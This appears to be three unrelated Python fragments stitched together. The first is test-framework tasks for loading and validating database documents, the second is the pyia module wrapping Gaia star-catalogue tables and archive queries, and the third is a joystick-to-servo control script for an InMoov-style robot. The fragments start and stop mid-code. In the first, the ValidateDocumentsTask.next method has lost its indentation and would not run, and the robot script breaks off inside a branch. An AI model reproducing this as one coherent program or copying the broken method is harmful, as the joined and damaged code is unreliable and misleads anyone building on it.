                    print_ops_rate_task.end_task()
                    self.task_manager.get_task_result(
                        print_ops_rate_task)
            self.log.debug("===========Tasks in loadgen pool=======")
            self.task_manager.print_tasks_in_pool()
            self.log.debug("=======================================")
            for task in tasks:
                self.task_manager.stop_task(task)
            for client in self.clients:
                client.close()
            self.complete_task()
            return self.fail

    def get_tasks(self, generator):
        """Slice *generator* by process_concurrency into batched
        LoadSubDocumentsTask instances."""
        generators = []
        tasks = []
        gen_start = int(generator.start)
        gen_end = max(int(generator.end), 1)
        gen_range = max(int((generator.end - generator.start) /
                            self.process_concurrency),
                        1)
        for pos in range(gen_start, gen_end, gen_range):
            if not isinstance(generator, SubdocDocumentGenerator):
                # NOTE(review): set_exception is passed a plain string,
                # not an Exception instance - confirm downstream handling.
                self.set_exception("Document generator needs to be of"
                                   " type SubdocDocumentGenerator")
            partition_gen = copy.deepcopy(generator)
            partition_gen.start = pos
            partition_gen.itr = pos
            partition_gen.end = pos + gen_range
            # Clamp the final slice to the generator's true end.
            if partition_gen.end > generator.end:
                partition_gen.end = generator.end
            batch_gen = BatchedDocumentGenerator(
                partition_gen,
                self.batch_size)
            generators.append(batch_gen)
        for i in range(0, len(generators)):
            task = LoadSubDocumentsTask(self.cluster, self.bucket,
                                        self.clients[i], generators[i],
                                        self.op_type, self.exp,
                                        create_paths=self.create_path,
                                        xattr=self.xattr,
                                        exp_unit=self.exp_unit,
                                        flag=self.flag,
                                        persist_to=self.persit_to,
                                        replicate_to=self.replicate_to,
                                        time_unit=self.time_unit,
                                        batch_size=self.batch_size,
                                        pause_secs=self.pause_secs,
                                        timeout_secs=self.timeout_secs,
                                        compression=self.compression,
                                        retries=self.retries,
                                        durability=self.durability)
            tasks.append(task)
        return tasks
class ContinuousDocUpdateTask(Task):
    """Repeatedly re-applies an "update" document load against one or
    more buckets until end_task() is called."""

    def __init__(self, cluster, task_manager, bucket, clients, generator,
                 exp, flag=0, persist_to=0, replicate_to=0,
                 durability="", time_unit="seconds",
                 only_store_hash=True, batch_size=1,
                 pause_secs=1, timeout_secs=5, compression=True,
                 process_concurrency=4, print_ops_rate=True):
        super(ContinuousDocUpdateTask, self).__init__(
            "ContinuousDocUpdateTask_{}_{}".format(bucket.name, time.time()))
        self.cluster = cluster
        self.exp = exp
        self.flag = flag
        self.persist_to = persist_to
        self.replicate_to = replicate_to
        self.durability = durability
        self.time_unit = time_unit
        self.only_store_hash = only_store_hash
        self.pause_secs = pause_secs
        self.timeout_secs = timeout_secs
        self.compression = compression
        self.process_concurrency = process_concurrency
        self.clients = clients
        self.task_manager = task_manager
        self.batch_size = batch_size
        self.generator = generator
        self.buckets = None
        self.success = dict()
        self.fail = dict()
        # Cache generator parameters for reference/debugging.
        self.key = self.generator.name
        self.doc_start_num = self.generator.start
        self.doc_end_num = self.generator.end
        self.doc_type = self.generator.doc_type
        self.op_type = "update"
        # Flag flipped by end_task() to stop the update loop.
        self.__stop_updates = False
        # bucket may be a single bucket or a list of buckets.
        if isinstance(bucket, list):
            self.buckets = bucket
        else:
            self.bucket = bucket

    def end_task(self):
        """Signal the update loop to stop after the current iteration."""
        self.__stop_updates = True

    def _start_doc_updates(self, bucket):
        """Run update batches against *bucket* until end_task() fires."""
        self.test_log.info("Updating docs in %s" % bucket.name)
        while not self.__stop_updates:
            doc_gens = list()
            doc_tasks = list()
            # One independent copy of the generator per SDK client.
            for _ in self.clients:
                doc_gens.append(copy.deepcopy(self.generator))
            for index, generator in enumerate(doc_gens):
                batch_gen = BatchedDocumentGenerator(generator,
                                                     self.batch_size)
                task = LoadDocumentsTask(
                    self.cluster, bucket, self.clients[index],
                    batch_gen, "update", self.exp,
                    persist_to=self.persist_to,
                    replicate_to=self.replicate_to,
                    durability=self.durability,
                    batch_size=self.batch_size,
                    timeout_secs=self.timeout_secs)
                self.task_manager.add_new_task(task)
                doc_tasks.append(task)
                # NOTE(review): task.fail is read here, immediately after
                # scheduling (before the task completes) - confirm intended.
                self.fail.update(task.fail)
            for task in doc_tasks:
                self.task_manager.get_task_result(task)
        self.test_log.info("Closing SDK clients..")
        # NOTE(review): clients are closed inside this per-bucket helper;
        # with multiple buckets, subsequent buckets would reuse closed
        # clients - confirm.
        for client in self.clients:
            client.close()
        self.test_log.info("Done updating docs in %s" % bucket.name)

    def call(self):
        """Entry point: run the update loop for each configured bucket."""
        self.start_task()
        if self.buckets:
            for bucket in self.buckets:
                self._start_doc_updates(bucket)
        else:
            self._start_doc_updates(self.bucket)
        self.complete_task()
class LoadDocumentsForDgmTask(LoadDocumentsGeneratorsTask):
    """Loads new documents into bucket(s) until each bucket's active
    resident-items ratio drops below `active_resident_threshold`, i.e.
    until the bucket reaches DGM (Disk Greater than Memory) state.

    Documents are loaded in chunks of 10000 per SDK client per pass
    (see _load_next_batch_of_docs), re-checking the ratio after each pass.
    """
    def __init__(self, cluster, task_manager, bucket, clients, key, exp,
                 doc_index=0, batch_size=50,
                 persist_to=0, replicate_to=0,
                 durability="",
                 timeout_secs=5,
                 process_concurrency=4, print_ops_rate=True,
                 active_resident_threshold=99,
                 task_identifier=""):
        # Fix: a bound super().__init__() call already supplies `self`;
        # the old code passed `self` again as the first positional
        # argument, shifting every parent-constructor parameter by one.
        # NOTE(review): `bucket.name` assumes a single Bucket object even
        # though a list is accepted below -- confirm with callers.
        super(LoadDocumentsForDgmTask, self).__init__(
            cluster, task_manager, bucket, clients, None,
            "create", exp, task_identifier="DGM_%s" % bucket.name)
        self.cluster = cluster
        self.exp = exp
        self.persist_to = persist_to
        self.replicate_to = replicate_to
        self.durability = durability
        self.timeout_secs = timeout_secs
        self.process_concurrency = process_concurrency
        self.clients = clients
        self.task_manager = task_manager
        self.batch_size = batch_size
        self.op_types = None
        self.buckets = None
        self.print_ops_rate = print_ops_rate
        self.active_resident_threshold = active_resident_threshold
        self.key = key
        self.task_identifier = task_identifier
        self.op_type = "create"
        self.rest_client = BucketHelper(self.cluster.master)
        # Next doc index to load from; advances by 10000 per client per pass
        self.doc_index = doc_index
        # Normalize to a list so call() treats single/multi bucket the same
        if isinstance(bucket, list):
            self.buckets = bucket
        else:
            self.buckets = [bucket]

    def _get_bucket_dgm(self, bucket):
        """Return the bucket's current active resident-items ratio (%)."""
        bucket_stat = self.rest_client.get_bucket_stats_for_node(
            bucket.name,
            self.cluster.master)
        return bucket_stat["vb_active_resident_items_ratio"]

    def _load_next_batch_of_docs(self, bucket):
        """Load one chunk of 10000 new docs per SDK client, in parallel."""
        doc_gens = list()
        doc_tasks = list()
        self.test_log.debug("Doc load from index %d" % self.doc_index)
        for _ in self.clients:
            doc_gens.append(doc_generator(
                self.key, self.doc_index, self.doc_index+10000))
            self.doc_index += 10000
        # Start doc_loading tasks
        for index, generator in enumerate(doc_gens):
            batch_gen = BatchedDocumentGenerator(generator, self.batch_size)
            task = LoadDocumentsTask(
                self.cluster, bucket, self.clients[index], batch_gen,
                "create", self.exp,
                persist_to=self.persist_to,
                replicate_to=self.replicate_to,
                durability=self.durability,
                timeout_secs=self.timeout_secs,
                skip_read_on_error=True)
            self.task_manager.add_new_task(task)
            doc_tasks.append(task)
        # Wait for doc_loading tasks to complete
        for task in doc_tasks:
            self.task_manager.get_task_result(task)

    def _load_bucket_into_dgm(self, bucket):
        """Keep loading until the resident ratio falls below the threshold."""
        dgm_value = self._get_bucket_dgm(bucket)
        self.test_log.info("DGM doc loading for '%s' to atleast %s%%"
                           % (bucket.name, self.active_resident_threshold))
        while dgm_value > self.active_resident_threshold:
            self.test_log.debug("Active_resident_items_ratio for {0} is {1}"
                                .format(bucket.name, dgm_value))
            self._load_next_batch_of_docs(bucket)
            dgm_value = self._get_bucket_dgm(bucket)
        self.test_log.info("DGM %s%% achieved for '%s'"
                           % (dgm_value, bucket.name))

    def call(self):
        """Task entry point: push every configured bucket into DGM."""
        self.test_log.info("Starting DGM doc loading task")
        self.start_task()
        for bucket in self.buckets:
            self._load_bucket_into_dgm(bucket)
        self.complete_task()
        self.test_log.info("Done loading docs for DGM")
class ValidateDocumentsTask(GenericLoadingTask):
    def __init__(self, cluster, bucket, client, generator, op_type, exp,
                 flag=0, proxy_client=None, batch_size=1, pause_secs=1,
                 timeout_secs=30, compression=True):
        """Validation task: reads back docs and compares against `generator`.

        `op_type` selects the expected state ('create'/'update' -> docs
        present with expected values, 'delete' -> docs absent).
        """
        super(ValidateDocumentsTask, self).__init__(
            cluster, bucket, client, batch_size=batch_size,
            pause_secs=pause_secs, timeout_secs=timeout_secs,
            compression=compression)
        # Thread name encodes bucket, doc range and op for easier debugging
        self.thread_name = "ValidateDocumentsTask-{}_{}_{}_{}".format(
            bucket.name, generator._doc_gen.start, generator._doc_gen.end,
            op_type)
        self.generator = generator
        self.op_type = op_type
        self.exp = exp
        self.flag = flag
        # Table used to report docs whose read failed unexpectedly
        self.failed_item_table = TableView(self.test_log.info)
        self.failed_item_table.set_headers(["READ doc_Id", "Exception"])
        self.missing_keys = []
        self.wrong_values = []
        self.failed_reads = dict()
        if proxy_client:
            # NOTE(review): uses self.log here but self.test_log above --
            # confirm both loggers exist on the base class.
            self.log.debug("Changing client to proxy %s:%s..."
                           % (proxy_client.host, proxy_client.port))
            self.client = proxy_client
    def has_next(self):
        """True while the batched generator still has docs to validate."""
        return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch()
if self.op_type == 'create':
self._process_values_for_create(key_value)
elif self.op_type == 'update':
self._process_values_for_update(key_value)
elif self.op_type == 'delete':
pass
else:
self.set_exception(Exception("Bad operation type: %s"
% self.op_type))
result_map, self.failed_reads = self.batch_read(key_value.keys())
for key, value in self.failed_reads.items():
if DurableExceptions.KeyNotFoundException not in str(self.failed_reads[key]["error"]):
self.failed_item_table.add_row([key, value['error']])
missing_keys, wrong_values = self.validate_key_val(result_map,
key_value)
if self.op_type == 'delete':
not_missing = []
if missing_keys.__len__() == key_value.keys().__len__():
for key in key_value.keys():
if key not in missing_keys:
not_missing.append(key)
if not_missing:
self.set_exception(Exception("Keys were not deleted. "
"Keys not deleted: {}"
.format(','.join(not_missing))))
else:
if missing_keys:
self.missing_keys.extend(missing_keys)
if | |
<filename>pyia/data.py<gh_stars>0
# coding: utf-8
""" Data structures. """
# Standard library
import pathlib
# Third-party
import astropy.coordinates as coord
from astropy.table import Table, Column
from astropy.time import Time
import astropy.units as u
import numpy as np
from .extinction import get_ext
from .ruwetools import U0Interpolator
__all__ = ["GaiaData"]
# This is from reading the data model
# Default physical units for the standard Gaia source columns. Used as a
# fallback when the loaded table does not carry its own unit metadata
# (see GaiaData.__init__, which overrides these with table units).
gaia_unit_map = {
    # Astrometry and radial velocity
    "ra": u.degree,
    "dec": u.degree,
    "parallax": u.milliarcsecond,
    "pmra": u.milliarcsecond / u.year,
    "pmdec": u.milliarcsecond / u.year,
    "radial_velocity": u.km / u.s,
    # 1-sigma uncertainties on the above
    "ra_error": u.milliarcsecond,
    "dec_error": u.milliarcsecond,
    "parallax_error": u.milliarcsecond,
    "pmra_error": u.milliarcsecond / u.year,
    "pmdec_error": u.milliarcsecond / u.year,
    "radial_velocity_error": u.km / u.s,
    # Astrometric solution quality indicators
    "astrometric_excess_noise": u.mas,
    "astrometric_weight_al": 1 / u.mas ** 2,
    "astrometric_pseudo_colour": 1 / u.micrometer,
    "astrometric_pseudo_colour_error": 1 / u.micrometer,
    "astrometric_sigma5d_max": u.mas,
    # Photometry (G, BP, RP bands) and colors
    "phot_g_mean_flux": u.photon / u.s,
    "phot_g_mean_flux_error": u.photon / u.s,
    "phot_g_mean_mag": u.mag,
    "phot_bp_mean_flux": u.photon / u.s,
    "phot_bp_mean_flux_error": u.photon / u.s,
    "phot_bp_mean_mag": u.mag,
    "phot_rp_mean_flux": u.photon / u.s,
    "phot_rp_mean_flux_error": u.photon / u.s,
    "phot_rp_mean_mag": u.mag,
    "bp_rp": u.mag,
    "bp_g": u.mag,
    "g_rp": u.mag,
    "rv_template_teff": u.K,
    # Galactic / ecliptic coordinates
    "l": u.degree,
    "b": u.degree,
    "ecl_lon": u.degree,
    "ecl_lat": u.degree,
    # Astrophysical parameter estimates with percentile bounds
    "teff_val": u.K,
    "teff_percentile_lower": u.K,
    "teff_percentile_upper": u.K,
    "a_g_val": u.mag,
    "a_g_percentile_lower": u.mag,
    "a_g_percentile_upper": u.mag,
    "e_bp_min_rp_val": u.mag,
    "e_bp_min_rp_percentile_lower": u.mag,
    "e_bp_min_rp_percentile_upper": u.mag,
    "radius_val": u.Rsun,
    "radius_percentile_lower": u.Rsun,
    "radius_percentile_upper": u.Rsun,
    "lum_val": u.Lsun,
    "lum_percentile_lower": u.Lsun,
    "lum_percentile_upper": u.Lsun,
    "ref_epoch": u.year,
}
# Reference epochs of the supported data releases
REF_EPOCH = {"DR2": Time(2015.5, format="jyear"), "EDR3": Time(2016.0, format="jyear")}
# Release assumed when callers do not specify one (see from_source_id)
LATEST_RELEASE = "EDR3"
class GaiaData:
"""Class for loading and interacting with data from the Gaia mission. This
should work with data from any data release, i.e., DR1 gaia_source or TGAS,
or DR2 gaia_source, or EDR3 gaia_source.
Parameters
----------
data : `astropy.table.Table`, `pandas.DataFrame`, dict_like, str
This must be pre-loaded data as any of the types listed above, or a
string filename containing a table that is readable by
`astropy.table.Table.read`.
"""
    def __init__(self, data, **kwargs):
        """Wrap a Gaia source table.

        Parameters
        ----------
        data : `astropy.table.Table`, str, `pathlib.Path`, or dict-like
            Loaded via ``Table.read`` when a str/Path is given; otherwise
            converted to a `Table` (preserving any column units).
        **kwargs
            Passed through to ``Table.read`` / ``Table``.
        """
        if not isinstance(data, Table):
            if isinstance(data, (str, pathlib.Path)):
                data = Table.read(data, **kwargs)
            else:
                # the dict-like object might have Quantity's, so we want to
                # preserve any units
                data = Table(data, **kwargs)
        # HACK: make sure table isn't masked, until astropy supports masked
        # quantities
        if data.masked:
            cols = []
            for c in data.colnames:
                col = data[c]
                col.mask = None
                cols.append(Column(col))
            data = Table(cols, copy=False)
        # Create a copy of the default unit map
        self.units = gaia_unit_map.copy()
        # Store the source table
        self.data = data
        # Update the unit map with the table units
        self._invalid_units = dict()
        for c in data.colnames:
            if data[c].unit is not None:
                try:
                    self.units[c] = u.Unit(str(data[c].unit))
                except ValueError:
                    # Remember unparseable units instead of failing outright
                    self._invalid_units[c] = data[c].unit
        # HACK: hard coded
        self._has_rv = (
            "radial_velocity" in self.data.colnames
            or "dr2_radial_velocity" in self.data.colnames
        )
        # For caching later
        self._cache = dict()
    @classmethod
    def from_query(cls, query_str, login_info=None, verbose=True):
        """
        Run the specified query and return a `GaiaData` instance with the
        returned data.
        This is meant only to be used for quick queries to the main Gaia science
        archive. For longer queries and more customized usage, use TAP access to
        any of the Gaia mirrors with, e.g., astroquery or pyvo.
        This requires ``astroquery`` to be installed.
        Parameters
        ----------
        query_str : str
            The string ADQL query to execute.
        login_info : dict, optional
            Username and password for the Gaia science archive as keys "user"
            and "password". If not specified, will use anonymous access, subject
            to the query limits.
        Returns
        -------
        gaiadata : `GaiaData`
            An instance of this object.
        """
        # astroquery is an optional dependency; import lazily and give an
        # actionable error message if it is missing.
        try:
            from astroquery.gaia import Gaia
        except ImportError:
            raise ImportError(
                "Failed to import astroquery. To use the "
                "from_query() classmethod, you must first"
                " install astroquery, e.g., with pip: "
                "\n\tpip install astroquery"
            )
        if login_info is not None:
            Gaia.login(**login_info)
        # Run the query as an asynchronous archive job and fetch the results
        job = Gaia.launch_job_async(query_str, verbose=verbose)
        tbl = job.get_results()
        return cls(tbl)
    @classmethod
    def from_source_id(cls, source_id, source_id_dr=None, data_dr=None, **kwargs):
        """Retrieve data from a DR for a given Gaia source_id in a DR.
        Useful if you have, e.g., a DR2 source_id and want EDR3 data.
        Parameters
        ----------
        source_id : int
            The Gaia source_id
        source_id_dr : str, optional
            The data release slug (e.g., 'dr2' or 'edr3') for the input
            source_id. Defaults to the latest data release.
        data_dr : str, optional
            The data release slug (e.g., 'dr2' or 'edr3') to retrieve data from.
            Defaults to the latest data release.
        **kwargs
            Passed to ``from_query()``
        Returns
        -------
        gaiadata : `GaiaData`
            An instance of this object.
        """
        # (older release -> newer release) -> archive cross-match table
        join_tables = {
            "dr1": {"dr2": "gaiadr2.dr1_neighbourhood"},
            "dr2": {"edr3": "gaiaedr3.dr2_neighbourhood"},
        }
        # Column prefix used inside the neighbourhood tables (EDR3 columns
        # are prefixed 'dr3' there)
        source_id_prefixes = {"dr1": "dr1", "dr2": "dr2", "edr3": "dr3"}
        if source_id_dr is None:
            source_id_dr = LATEST_RELEASE.lower()
        if data_dr is None:
            data_dr = LATEST_RELEASE.lower()
        # Same release on both sides: no cross-match needed
        if source_id_dr == data_dr:
            query_str = f"""
                SELECT * FROM gaia{data_dr}.gaia_source AS gaia
                WHERE gaia.source_id = {source_id}
            """
            return cls.from_query(query_str, **kwargs)
        # Lexicographic sort happens to order these slugs by release age
        # ('dr1' < 'dr2' < 'edr3'), matching the join_tables nesting.
        dr1, dr2 = sorted([source_id_dr, data_dr])
        try:
            join_table = join_tables[dr1][dr2]
            source_id_pref = source_id_prefixes[source_id_dr]
            data_pref = source_id_prefixes[data_dr]
        except KeyError:
            raise KeyError(
                f"Failed to find join table for {source_id_dr} " f"to {data_dr}"
            )
        query_str = f"""
            SELECT * FROM gaia{data_dr}.gaia_source AS gaia
            JOIN {join_table} AS old_gaia
                ON gaia.source_id = old_gaia.{data_pref}_source_id
            WHERE old_gaia.{source_id_pref}_source_id = {source_id}
        """
        return cls.from_query(query_str, **kwargs)
##########################################################################
# Python internal
#
    def __getattr__(self, name):
        """Expose table columns as attributes, with units attached when the
        column is in the unit map.

        Requests for ``radial_velocity*`` fall back to the EDR3-style
        ``dr2_radial_velocity*`` column names when needed.
        """
        # to prevent recursion errors:
        # nedbatchelder.com/blog/201010/surprising_getattr_recursion.html
        if name in ["data", "units"]:
            raise AttributeError()
        lookup_name = name
        if name.startswith("radial_velocity"):
            # HACK: this should be more general...
            if (
                "radial_velocity" not in self.data.colnames
                and "dr2_radial_velocity" in self.data.colnames
            ):
                lookup_name = f"dr2_{name}"
        coldata = self.data[lookup_name]
        # Fill masked entries first so np.asarray yields a plain ndarray
        if hasattr(coldata, "mask") and coldata.mask is not None:
            arr = coldata.filled()
        else:
            arr = coldata
        arr = np.asarray(arr)
        if name in self.units:
            return arr * self.units[name]
        else:
            return arr
    def __setattr__(self, name, val):
        """Route attribute assignment for known columns into the table."""
        if name in ["data", "units"]:
            # needs to be here to catch the first time we enter this func.
            super().__setattr__(name, val)
        elif name in self.units:
            # Unit-ful column: require a Quantity so we can record its unit
            if not hasattr(val, "unit"):
                raise ValueError(
                    'To set data for column "{0}", you must '
                    "provide a Quantity-like object (with units).".format(name)
                )
            self.data[name] = val
            self.units[name] = val.unit
        elif name in self.data.columns:
            # Existing unit-less column: store as-is
            self.data[name] = val
        else:
            # Anything else is a regular instance attribute
            super().__setattr__(name, val)
def __dir__(self):
return super().__dir__() + [str(k) for k in self.data.columns]
def __getitem__(self, slc):
if isinstance(slc, int):
slc = slice(slc, slc + 1)
elif isinstance(slc, str):
return self.__getattr__(slc)
return self.__class__(self.data[slc])
def __setitem__(self, name, val):
if hasattr(val, "unit"):
self.data[name] = val.value
self.units[name] = val.unit
else:
self.data[name] = val
    def __len__(self):
        """Number of rows in the underlying table."""
        return len(self.data)
def __str__(self):
names = ["ra", "dec", "parallax", "pmra", "pmdec"]
if self._has_rv:
names.append("radial_velocity")
return str(self.data[names])
def __repr__(self):
return "<GaiaData: {0:d} rows>".format(len(self))
##########################################################################
# Computed and convenience quantities
#
    @property
    def pm(self):
        """2D proper motion. Has shape `(nrows, 2)`"""
        # Convert pmdec into pmra's unit so the stacked array is homogeneous
        _u = self.pmra.unit
        return np.vstack((self.pmra.value, self.pmdec.to(_u).value)).T * _u
@u.quantity_input(min_parallax=u.mas, equivalencies=u.parallax())
def get_distance(
self, min_parallax=None, parallax_fill_value=np.nan, allow_negative=False
):
"""Compute distance from parallax (by inverting the parallax) using
`~astropy.coordinates.Distance`.
Parameters
----------
min_parallax : `~astropy.units.Quantity` (optional)
If `min_parallax` specified, the parallaxes are clipped to this
values (and it is also used to replace NaNs).
allow_negative : bool (optional)
This is passed through to `~astropy.coordinates.Distance`.
Returns
-------
dist : `~astropy.coordinates.Distance`
A ``Distance`` object with the data.
"""
plx = self.parallax.copy()
if np.isnan(parallax_fill_value):
parallax_fill_value = parallax_fill_value * u.mas
if min_parallax is not None:
clipped = plx < min_parallax
clipped |= ~np.isfinite(plx)
plx[clipped] = parallax_fill_value
return coord.Distance(parallax=plx, allow_negative=allow_negative)
    @property
    def distance(self):
        """Assumes 1/parallax. Has shape `(nrows,)`.
        This attribute will raise an error when there are negative or zero
        parallax values. For more flexible retrieval of distance values and
        auto-filling bad values, use the .get_distance() method."""
        # Delegates to get_distance() with its defaults (no clipping)
        return self.get_distance()
def get_radial_velocity(self, fill_value=None):
"""Return radial velocity but with invalid values filled with the
specified fill value.
Parameters
----------
fill_value : `~astropy.units.Quantity` (optional)
If not ``None``, fill any invalid values with the specified value.
"""
rv = self.radial_velocity.copy()
rv[~np.isfinite(rv)] = fill_value
return rv
    @property
    def distmod(self):
        """Distance modulus, m-M = 5 * log10(dist / (10 pc))"""
        # Derived from the 1/parallax distance; like `distance`, this
        # raises for non-positive parallaxes.
        return self.distance.distmod
@property
def vtan(self):
"""
Tangential velocity computed using the proper motion and inverse
parallax as the distance. Has shape `(nrows, 2)`
"""
d = self.distance
vra = (self.pmra * d).to(u.km / u.s, u.dimensionless_angles()).value
vdec = (self.pmdec * d).to(u.km / u.s, u.dimensionless_angles()).value
return np.vstack((vra, vdec)).T * u.km / u.s
def get_cov(self, RAM_threshold=1 * u.gigabyte, units=None):
"""
The Gaia data tables contain correlation coefficients and standard
deviations for (ra, dec, parallax, pm_ra, pm_dec), but for most analyses
we need covariance matrices. This converts the data provided by Gaia
into covariance matrices.
| |
# MyRobotLab (Jython) setup: announce the script, open the serial port, and
# wire a Joystick service to the python handler defined below.
# `voice` selects the spoken-feedback language (1 appears to be Swedish).
if voice == 0:
    i01.mouth.speak("loading joystick Script")
elif voice == 1:
    i01.mouth.speak("laddar joystick Script")
serial = Runtime.createAndStart("serial","Serial")
# NOTE(review): hard-coded port -- confirm on the target machine
serial.connect('COM7')
joystick = Runtime.start("joystick","Joystick")
# Hardware-specific controller index; confirm against Joystick.getControllers()
joystick.setController(14)
# Route published joystick events to onJoystick1Input in the python service
listener3 = MRLListener('publishJoystickInput', 'python', 'onJoystick1Input')
joystick.addListener(listener3)
# Last-sent head-tracking positions (used to avoid resending identical targets)
Yval1 = 90
Yval2 = 90
Xval1 = 90
Xval2 = 90
# Per-axis latch values used by the incremental (mode 2) servo stepping below
lstest = 0
lrtest = 0
lbtest = 0
lwtest = 0
rstest = 0
rrtest = 0
rbtest = 0
rwtest = 0
def onJoystick1Input(data):
# if (data.id== "Esc" and data.value == 1.0):
# if drive == 0:
# drivemode()
# elif drive == 1:
# gesturemode()
# elif drive == 2:
# autonomousmode()
if (data.id== "z"):
if handshake == 1:
global test
test = data.value * 180
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.thumb.moveTo(int(float(test2)))
i01.rightHand.index.moveTo(int(float(test2)))
i01.rightHand.majeure.moveTo(int(float(test2)))
i01.rightHand.ringFinger.moveTo(int(float(test2)))
i01.rightHand.pinky.moveTo(int(float(test2)))
if arms == 0:
global XboxZ
XboxZ = ((data.value + 1) * 127)
XboxZ = ("%.0f"%XboxZ)
if (arms == 1) or (arms == 2):
global test
test = data.value * 180
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.thumb.moveTo(int(float(test2)))
i01.rightHand.index.moveTo(int(float(test2)))
i01.rightHand.majeure.moveTo(int(float(test2)))
i01.rightHand.ringFinger.moveTo(int(float(test2)))
i01.rightHand.pinky.moveTo(int(float(test2)))
i01.leftHand.thumb.moveTo(int(float(test2)))
i01.leftHand.index.moveTo(int(float(test2)))
i01.leftHand.majeure.moveTo(int(float(test2)))
i01.leftHand.ringFinger.moveTo(int(float(test2)))
i01.leftHand.pinky.moveTo(int(float(test2)))
if leftarm == 1 or leftarm == 2:
global test
test = 180 - ((1 + data.value ) * 180)
test2 = ("%.0f"%test)
# print(test2)
i01.leftHand.thumb.moveTo(int(float(test2)))
i01.leftHand.index.moveTo(int(float(test2)))
i01.leftHand.majeure.moveTo(int(float(test2)))
i01.leftHand.ringFinger.moveTo(int(float(test2)))
i01.leftHand.pinky.moveTo(int(float(test2)))
if rightarm == 1 or rightarm == 2:
global test
test = data.value * 180
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.thumb.moveTo(int(float(test2)))
i01.rightHand.index.moveTo(int(float(test2)))
i01.rightHand.majeure.moveTo(int(float(test2)))
i01.rightHand.ringFinger.moveTo(int(float(test2)))
i01.rightHand.pinky.moveTo(int(float(test2)))
if (data.id== "rx"):
if handshake == 1:
global test
test = 180 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.wrist.moveTo(int(float(test2)))
global test
test = (data.value + 1) * 90
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.rotate.moveTo(int(float(test2)))
if arms == 0:
global XboxRX
XboxRX = (data.value + 1) * 127.5
XboxRX = ("%.0f"%XboxRX)
if arms == 1:
global test
test = (data.value + 1) * 90
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.rotate.moveTo(int(float(test2)))
i01.leftArm.rotate.moveTo(int(float(test2)))
if arms == 2:
if data.value > 0.2:
if data.value > rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
test = (i01.leftArm.rotate.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.rotate.moveTo(int(float(test2)))
i01.leftArm.rotate.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rrtest
rrtest = 0
elif data.value < -0.2:
if data.value < rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
test = (i01.leftArm.rotate.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.rotate.moveTo(int(float(test2)))
if rightarm == 1:
global test
test = (data.value + 1) * 90
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.rotate.moveTo(int(float(test2)))
if leftarm == 1:
global test
test = 180 - ((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.leftHand.wrist.moveTo(int(float(test2)))
elif leftarm == 2:
if data.value > 0.2:
if data.value > lwtest:
global lwtest
lwtest = data.value
global test
test = (i01.leftHand.wrist.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftHand.wrist.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global lwtest
lwtest = 0
elif data.value < -0.2:
if data.value < lwtest:
global lwtest
lwtest = data.value
global test
test = (i01.leftHand.wrist.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftHand.wrist.moveTo(int(float(test2)))
elif rightarm == 2:
if data.value > 0.2:
if data.value > rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rrtest
rrtest = 0
elif data.value < -0.2:
if data.value < rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
if (data.id== "ry"):
if handshake == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.bicep.moveTo(int(float(test2)))
i01.rightArm.shoulder.moveTo(int(float(test2)))
if arms == 0:
global XboxRY
XboxRY = 255 - ((data.value + 1) * 127.5)
XboxRY = ("%.0f"%XboxRY)
if arms == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.shoulder.moveTo(int(float(test2)))
i01.leftArm.shoulder.moveTo(int(float(test2)))
if arms == 2:
if data.value > 0.2:
if data.value > rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
test = (i01.leftArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rstest
rstest = 0
elif data.value < -0.2:
if data.value < rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
test = (i01.leftArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
if rightarm == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.shoulder.moveTo(int(float(test2)))
if leftarm == 1:
global test
test = 120 - ((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif leftarm == 2:
if data.value > 0.2:
if data.value > lbtest:
global lbtest
lbtest = data.value
global test
test = (i01.leftArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global lbtest
lbtest = 0
elif data.value < -0.2:
if data.value < lbtest:
global lbtest
lbtest = data.value
global test
